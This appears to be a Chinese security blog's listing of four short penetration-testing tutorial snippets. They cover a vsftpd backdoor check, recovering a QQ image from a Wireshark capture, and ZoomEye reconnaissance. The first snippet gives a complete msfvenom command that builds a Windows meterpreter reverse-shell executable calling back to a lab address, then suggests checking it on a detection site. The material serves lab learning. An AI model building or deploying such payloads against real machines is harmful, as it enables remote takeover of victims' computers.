- 博客(4)
- 收藏
- 关注
RSS订阅原创 Kali中生成被控端
用到参数-p、-f 、-o -p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe。本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序。指定保存位置/root/payload.exe。指定哪些有效载荷生成。得到文件后上网站检测。
2024-10-28 22:52:04
240
原创 Python脚本检测笑脸漏洞
上安装了软件VSFTPD v2.3.4 vsftpd是Very Secure FTP daemon;是FTP服务器 但是在它的代码中却存在着一个重大问题, 在文件str.c中出现了一行与程序功能无关的代码。二.虚拟机中打开终端输入ifconfig查看ip。四.编写python脚本于虚拟机中。三.使用nmap查看靶机ip。
2024-10-28 22:12:22
160
原创 Wireshark对新版qq9的数据捕获
四.得到jpg文件后打开显示文件损坏,是因为有多余的前缀,将jpg文件拖入WinHex中搜索ffd8去除其之前的所有数据得到手机发送的原图。一.确保手机与笔记本连接在同一网络中,登录同一个qq账号,打开Wireshark进行数据捕获。二.手机向电脑发送后缀为jpg的图片,随后停止Wireshark的捕获,在过滤器中输入tcp。再使用编辑中的搜索功能搜索十六进制值ffd8(ffd8是jpg文件的固定前缀)在打开的窗口中将整个对话改为最大的文件以原始数据用jpg后缀保存。
2024-10-28 21:45:22
309
原创 对ZoomEye(钟馗之眼)及类似搜索引擎的简单介绍和如何进行子域名收集
ZoomEye(钟馗之眼)是一个专注于网络空间搜索的引擎,主要用于发现和分析连接到互联网的设备和服务。其目标是提供关于在线设备、安全漏洞和网络基础设施的信息,帮助用户进行渗透测试、网络安全分析和资产管理。子域名收集是网络安全和信息收集中的一个重要环节,特别是在渗透测试和漏洞评估中。
2024-10-08 21:22:16
1127
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人